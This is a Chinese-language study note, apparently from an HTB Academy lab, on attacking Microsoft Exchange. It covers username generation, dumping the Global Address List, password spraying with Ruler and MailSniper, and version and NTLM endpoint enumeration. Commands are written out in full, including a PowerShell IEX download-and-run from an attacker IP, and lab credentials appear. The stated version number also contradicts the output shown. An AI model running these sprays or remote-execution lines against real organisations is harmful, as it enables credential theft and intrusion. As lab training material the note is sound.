Exchange 枚举

created: 2026-03-16 18:25
tags:
  - Exchange
aliases:
  - username-anarchy
  - Ruler
  - MailSniper
  - ntlmscan
Type:
title:
updated: 2026-03-16 22:25

1. Exchange 介绍

Microsoft Exchange 使用不同的客户端和/或 API 进行通信，例如 Exchange Web Services (EWS)、Outlook Web App (OWA)、基于 HTTP 的 MAPI 和 ActiveSync (EAS)。EWS 是一种基于 HTTP 的 SOAP 协议，可用于各种不同的应用程序

服务（组件）	描述
AutoDiscover (自动发现)	仅通过用户名和密码即可连接到 Exchange 服务器的一种机制。
Outlook Web App (OWA)	基于浏览器的电子邮件客户端。
Global Address List (GAL/全球地址列表)	包含 Active Directory 中所有用户电子邮件地址的目录。
Outlook Rules (Outlook 规则)	一组根据预设条件自动运行的触发器（用于处理邮件）。

大多数组织都会提供面向公众的 Exchange 登录服务，例如 Outlook Web App，通常可通过 mail.company.org 或 company.org/owa 访问。这样无需在本地安装应用程序即可与 Exchange 进行交互

Pasted image 20260316214451.png

2. 枚举 Exchange

2.1. 用户枚举

下面是一个示例的用户字典

Orval Hodge
Rosie Olsen
Juliette Hull
Wallace Moss
Enid Quinn
Amelia Gross
Tammi Solis
Alma Barber
Gale Dawson
Monroe Novak

2.1.1. 用username-anarchy生成社工字典

这里使用usernameAnarchy来生成社工字典

git clone https://github.com/urbanadventurer/username-anarchy.git
┌──(root㉿kali)-[~/…/htb/Academy/exchange/username-anarchy]
└─# ./username-anarchy --input-file user.txt 
orval
orvalhodge
orval.hodge
orvalhod
orvahodg
orvalh
o.hodge
ohodge
horval
h.orval
hodgeo
hodge
hodge.o
hodge.orval
oh
rosie
rosieolsen
rosie.olsen
rosieols
rosiolse
rosieo
<SNIP>

我们也可以使用--list-formats选项指定特定的格式

┌──(root㉿kali)-[~/…/htb/Academy/exchange/username-anarchy]
└─# ./username-anarchy --list-formats       
Plugin name             Example
--------------------------------------------------------------------------------
first                   anna
firstlast               annakey
first.last              anna.key
firstlast[8]            annakey
first[4]last[4]         annakey
firstl                  annak
f.last                  a.key
flast                   akey
lfirst                  kanna
l.first                 k.anna
lastf                   keya
last                    key
last.f                  key.a
last.first              key.anna
FLast                   AKey
first1                  anna0,anna1,anna2
fl                      ak
fmlast                  abkey
firstmiddlelast         annaboomkey
fml                     abk
FL                      AK
FirstLast               AnnaKey
First.Last              Anna.Key
Last                    Key

2.2. 导出用户邮箱地址

如果我们已经可以访问到域内计算机或者电子邮件，我们可以导出用户邮箱地址。无需进行猜测了

2.2.1. on Linux

Linux上可以使用脚本 global-address-list-owa

wget -q https://raw.githubusercontent.com/pigeonburger/global-address-list-owa/main/emailextract.py
python3 emailextract.py -i exch01.inlanefreight.local -u htb-student@inlanefreight.local -p 'HTB_@cademy_stdnt!'
Connecting to exch01.inlanefreight.local/owa

Login Successful!
Canary key: lmj6izRyEk66IpjRQjD-mCCTTv9QvNwI181R0T8_pNdWVLyFHPdR61sYLyyKUTJHj0Le0ZqezYk.
Global List Address ID: e145c509-4761-4507-a92b-e5f76a19daea
Administrator@inlanefreight.local
AllCompany@inlanefreight.local
a.barber@inlanefreight.local
a.gross@inlanefreight.local
d.smitt@inlanefreight.local
e.quinn@inlanefreight.local
g.dawson@inlanefreight.local
...SNIP...

2.2.2. On Windows

可以使用 Windows 系统中的 MailSniper 或 PowerView来获取电子邮件列表

PS C:\Tools> IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.228:8000/MailSniper.ps1')
PS C:\Tools> Get-GlobalAddressList -ExchHostname exch01.inlanefreight.local -Username htb-student -Password 'HTB_@cademy_stdnt!' -OutFile globaladdresslist.txt
[*] First trying to log directly into OWA to enumerate the Global Address List using FindPeople...
[*] This method requires PowerShell Version 3.0
[*] Using https://exch01.inlanefreight.local/owa/auth.owa
[*] Logging into OWA...
[*] OWA login appears to have failed.

[*] FindPeople method failed. Trying Exchange Web Services...
[*] Trying Exchange version Exchange2010
[*] Using EWS URL https://exch01.inlanefreight.local/EWS/Exchange.asmx
[*] Now attempting to gather the Global Address List. This might take a while...

Administrator@inlanefreight.local
AllCompany@inlanefreight.local
a.barber@inlanefreight.local
a.gross@inlanefreight.local
a.barber@inlanefreight.local
g.dawson@inlanefreight.local
e.quinn@inlanefreight.local
g.dawson@inlanefreight.local
...SNIP...

2.3. 密码喷洒

在做密码喷洒之前，一般需要先了解目标的密码策略。如果不了解可以尝试常见的如companyName<YEAR>! 或 seasons<YEAR>!等

2.3.1. On Linux （Ruler）

我们可以使用 Ruler来进行密码喷洒，也可以做用户枚举

Ruler 是一款允许您通过 MAPI/HTTP 或 RPC/HTTP 协议远程与 Exchange 服务器交互的工具。其主要目的是滥用客户端 Outlook 功能，从而远程获取 shell 权限。它还支持多种可用于访问或利用 Exchange 的命令，例如添加、删除、显示规则或检查用户邮箱。Ruler 还可以利用自动发现功能，根据给定的用户列表发现电子邮件；随后，在收集到有效电子邮件地址后，它支持密码喷洒攻击。我们可以使用 Ruler 的帮助菜单查看所有可用功能：

wget https://github.com/sensepost/ruler/releases/download/2.4.1/ruler-linux64

枚举

./ruler-linux64 --domain inlanefreight.local --insecure brute --users global_address_list.txt --passwords passwords.txt --verbose -a 4
[+] Starting bruteforce
[+] Trying to Autodiscover domain
[+] 0 of 3 passwords checked
[x] Failed: Administrator@inlanefreight.local:Inlanefreight2022!
[x] Failed: AllCompany@inlanefreight.local:Inlanefreight2022!
[x] Failed: a.barber@inlanefreight.local:Inlanefreight2022!
[x] Failed: a.gross@inlanefreight.local:Inlanefreight2022!
...SNIP...

autodiscover:枚举有效的用户名和密码
--insecure：忽略证书校验

2.3.2. On Windows(MailSniper)

我们可以使用 MailSniper中的Invoke-PasswordSprayOWA 或 Invoke-PasswordSprayEWS 函数来进行爆破

PS C:\Tools> Invoke-PasswordSprayOWA -ExchHostname exch01.inlanefreight.local -UserList .\usernames.txt -Password "Inlanefreight2022!" -OutFile creds.txt

[*] Now spraying the OWA portal at https://exch01.inlanefreight.local/owa/
[*] Current date and time: 08/14/2024 07:21:59
[*] SUCCESS! User:INLANEFREIGHT\exampleUser Password:Inlanefreight2022!
[*] A total of 1 credentials were obtained.
Results have been written to creds.txt.

2.4. 密码策略

组织通常会实施账户锁定策略，该策略会在 3 到 5 次登录失败后触发，但具体阈值可能有所不同
我们可以通过PowerView来进行查看

PS C:\Users\htb-student\Desktop> (Get-DomainPolicy)."SystemAccess"


MinimumPasswordAge           : 1
MaximumPasswordAge           : 42
MinimumPasswordLength        : 7
PasswordComplexity           : 1
PasswordHistorySize          : 24
LockoutBadCount              : 0RequireLogonToChangePassword : 0
ForceLogoffWhenHourExpire    : 0
ClearTextPassword            : 0
LSAAnonymousNameLookup       : 0

LockoutBadCount 值为 0 表示帐户锁定功能已禁用失败锁定功能，不会在多次登录失败后被锁定

2.5. 版本枚举

了解 Exchange 的具体版本有助于我们使用针对性的漏洞

我们可以利用名为 eDiscovery 的功能来获取到目标的版本

┌──(root㉿kali)-[~/…/htb/Academy/exchange/username-anarchy]
└─# curl https://10.129.231.81/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application -k | xmllint --format - | grep version  
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 15856 100 15856   0     0  5596     0   0:00:02  0:00:02 --:--:--  5596
<?xml version="1.0" encoding="utf-8"?>
  <assemblyIdentity xmlns="urn:schemas-microsoft-com:asm.v1" name="microsoft.exchange.ediscovery.exporttool.application" version="15.2.721.2" publicKeyToken="1f16bd4ec4c2bb19" language="neutral" processorArchitecture="msil"/>
      <assemblyIdentity name="microsoft.exchange.ediscovery.exporttool" version="15.2.721.2" publicKeyToken="1f16bd4ec4c2bb19" language="neutral" processorArchitecture="msil" type="win32"/>
              <as:assemblyIdentity xmlns="urn:schemas-microsoft-com:asm.v1" name="microsoft.exchange.ediscovery.exporttool.application" version="15.2.721.2" publicKeyToken="1f16bd4ec4c2bb19" language="neutral" processorArchitecture="msil"/>

可以获取到版本为15.1.2375.7，根据微软的文档可以得知其为Exchange Server 2016 CU22

2.6. NTLM 端点枚举 (ntlmscan)

可以使用 ntlmscan来进行枚举，他会使用默认的paths.dic 字典中的预定义端点执行各种检查，并查找需要 NTLM 身份验证的端点。例如 autodiscover 和 ews

git clone https://github.com/nyxgeek/ntlmscan

ntlmscan 允许我们针对 URL 或主机进行搜索。此外，该工具还可以执行虚拟主机枚举。它可用于定位 OWA 服务器、Skype for Business、自动发现服务器和 ADFS 服务器

┌──(root㉿kali)-[~/…/htb/Academy/exchange/ntlmscan]
└─# python3 ntlmscan.py  --host https://10.129.231.81
custom dictionary has been set to /root/Desktop/htb/Academy/exchange/ntlmscan/paths.dict
[-] Testing path https://10.129.231.81/abs/
[-] Testing path https://10.129.231.81/ucwa/
[-] Testing path https://10.129.231.81/unifiedmessaging/
[-] Testing path https://10.129.231.81/webticket/
[-] Testing path https://10.129.231.81/webticket/webticketservice.svc
[-] Testing path https://10.129.231.81/_windows/default.aspx?ReturnUrl=/
[-] Testing path https://10.129.231.81/
[-] Testing path https://10.129.231.81/
[+] FOUND NTLM - https://10.129.231.81/oab/[+] FOUND NTLM - https://10.129.231.81/rpc/[+] FOUND NTLM - https://10.129.231.81/ews/[+] FOUND NTLM - https://10.129.231.81/autodiscover/
Testing complete

还可以使用 http-ntlm.info.root Nmap 脚本枚举 HTTPS 服务，提取与域名、计算机名等相关的信息

┌──(root㉿kali)-[~/…/htb/Academy/exchange/ntlmscan]
└─# nmap -sV --script http-ntlm-info --script-args http-ntlm-info.root=/ews/ -p443 10.129.231.81
Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-16 10:22 EDT
Nmap scan report for EXCH01.inlanefreight.local (10.129.231.81)
Host is up (0.28s latency).

PORT    STATE SERVICE   VERSION
443/tcp open  ssl/https
|_http-server-header: Microsoft-IIS/10.0
| http-ntlm-info: 
|   Target_Name: INLANEFREIGHT
|   NetBIOS_Domain_Name: INLANEFREIGHT
|   NetBIOS_Computer_Name: EXCH01
|   DNS_Domain_Name: inlanefreight.local
|   DNS_Computer_Name: EXCH01.inlanefreight.local
|   DNS_Tree_Name: inlanefreight.local
|_  Product_Version: 10.0.17763

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.65 seconds